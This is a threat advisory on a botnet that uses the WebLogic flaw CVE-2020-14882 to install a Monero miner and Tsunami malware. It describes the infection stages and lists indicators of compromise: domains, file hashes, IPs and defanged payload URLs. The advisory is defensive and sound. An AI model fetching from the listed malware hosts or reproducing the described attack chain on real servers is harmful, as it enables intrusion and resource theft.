Rewterz Threat Alert – Malicious NPM Packages Install njRAT
December 2, 2020Rewterz Threat Advisory – Mozilla Thunderbird SMTP server response codes buffer overflow
December 3, 2020Rewterz Threat Alert – Malicious NPM Packages Install njRAT
December 2, 2020Rewterz Threat Advisory – Mozilla Thunderbird SMTP server response codes buffer overflow
December 3, 2020Severity
Medium
Analysis Summary
A botnet is detected that propagates using weblogic exploit. The botnet carries two payloads: 1) a Monero XMR Miner binaries; and 2) Tsunami binaries. This botnet is primarily targeting cloud servers. In September, an earlier version of the botnet was exploiting misconfigured docker API. Interestingly, the current botnet version contains unused code for exploiting Redis and for bruteforcing SSH. The botnet achieves persistence in multiple ways; kills running processes, potentially competing mining tools and eliminates EDR. It uses base64 encoded intermediate stage shell-scripts and base64 encoded commands to download and execute python scripts. Tsunami is added as a second payload, in addition to Monero XMR miner.
It makes use of the Oracle WebLogic RCE exploit CVE-2020-14882. The campaign uses multiple shell-scripts and python-scripts with different dropping locations and connects to binary hosting webservers using hardcoded IP addresses and domains.
The stage 1 executes two payloads, a shell script, xms, and a python script. The shellscript xms is piped to bash from curl, in case that fails, it is fetched with wget, executed and removed, to prevent analysis. The python script is fetched and executed using base64 encoded commands to avoid detection and analysis. The xms shell script attempts to infect hosts that the server has been previously connected to. It also lists running processes to grab information about active SSH connections. The XMR Miner is also targeting Windows servers which is evident by the presence of .exe binaries in the same ftp server.
Impact
- Unauthorized Remote Code Execution
- Unauthorized Access
- Process Termination
- Detection Evasion
- Unauthorized Resource Consumption
Indicators of Compromise
Domain Name
- icanhazip[.]com
- bash[.]givemexyz[.]in
- pool[.]supportxmr[.]com
- xmr[.]givemexyz[.]in
MD5
- 01581ccc96ce7ccc15205bb859d9e6bd
- cd7ca50a01fc9c6e8fdc8c3d5e6100f0
- 8bfc072d37f41190515f8dc00a59fb2e
- 5954b9c0ee8490f6f1215bace6f6c6e4
- ee48aa6068988649e41febfa0e3b2169
- c4d44eed4916675dd408ff0b3562fb1f
- 5f15d232552301b9e53d597666f610ad
- 528cfc90fd59af990c2ebc18c0df9b47
- 790c54d34b09f078a24cf27d6c91740e
- 9a9a2ffdfa4d2586eef0d1d987b57e9e
- 8bcf9e1f24093bbf32fbbc3630a0153c
- eefc0ce93d254982fbbcd26460f3d10d
- b1fc3486f3f4d3f23fcbf8b8b0522bf8
- f0551696774f66ad3485445d9e3f7214
SHA-256
- 72acbfdeadfa31d7ccda7fdcc93944b1948e263239af8850e5b44c518da0a4c5
- fdc7920b09290b8dedc84c82883b7a1105c2fbad75e42aea4dc165de8e1796e3
- 35e45d556443c8bf4498d8968ab2a79e751fc2d359bf9f6b4dfd86d417f17cfb
- 6f7393474c6f3c452513231d1e3fa07ed9dcc8d53a1bb2d680c78e9aa03f8f9d
- 9b8280f5ce25f1db676db6e79c60c07e61996b2b68efa6d53e017f34cbf9a872
- 855557e415b485cedb9dc2c6f96d524143108aff2f84497528a8fcddf2dc86a2
- 22e3611cb2b156c3dc2d192b65707aac7787955d7dc120dfbc09aef8e12251b5
- b07bf6e14050c1c56c9b80155417370b4704eb0655cfc18bb4259956162c3814
- 508ec039ca9885f1afc6f15bb70adfa9ed32f9c2d0bff511052edb39898951c7
- 8dbd281c98c8e176621566e3a77eb8a3b7ae4f254773d56f7033f903dd09a043
- 030f41373567846ee18716605dea3ef94d1861b9c32b664d25026d41c3557c00
- 9aa8a11a52b21035ef7badb3f709fa9aa7e757788ad6100b4086f1c6a18c8ab2
- 1d804c5dfa6da0db4a4465232ad9117003df2ea8f0fc68d9e48700d4373a4568
- 1225cc15a71886e5b11fca3dc3b4c4bcde39f4c7c9fbce6bad5e4d3ceee21b3a
SHA1
- 2940e96f15345149143c53143a87fd9dce45d0ac
- e632f6b93f9e3d3f90ac2068af0b9f1ccee3cd89
- 2d9600a0697de84522b4e65d9be02b9ed9352b4d
- 2132c65f23f8e5a3c533bfa4ab73562c476795e0
- 73c2099c703c9e644172ff58fd49622c06bf2784
- 57279a4f3ccd3f6abbc2c306682438234241598b
- 2847609cb04158c6f8e57ec65d63fabc68577a07
- 9173ca39c025c322864b05a1cd44c022925d7ffc
- 87fe997bb49499d1f743da9840618e30aeb5d24e
- 01ebd97e50edc39ade8cefacaffe5bef5c49bf15
- adaaf46b2bd14a05e58a460e0e2115e696c182fa
- bae9b44362654ef283cbd197bca4d2b3aca8868d
- 7bfa2404bc9733205d2374b92fb3ebf57410228f
- d5f53aa9b9e9899fa511b199230159dfbf215dad
Source IP
- 205[.]185[.]116[.]78
- 66[.]70[.]218[.]40
- 209[.]141[.]35[.]17
- 104[.]244[.]75[.]25
- 198[.]98[.]57[.]217
- 194[.]156[.]99[.]30
URL
- http[:]//205[.]185[.]116[.]78/b[.]py
- http[:]//bash[.]givemexyz[.]in/dd[.]py
Remediation
- Block the threat indicators at their respective controls.
- Keep all systems and software updated to latest patched versions.
- Maintain a strong password policy and enable multifactor authentication where possible.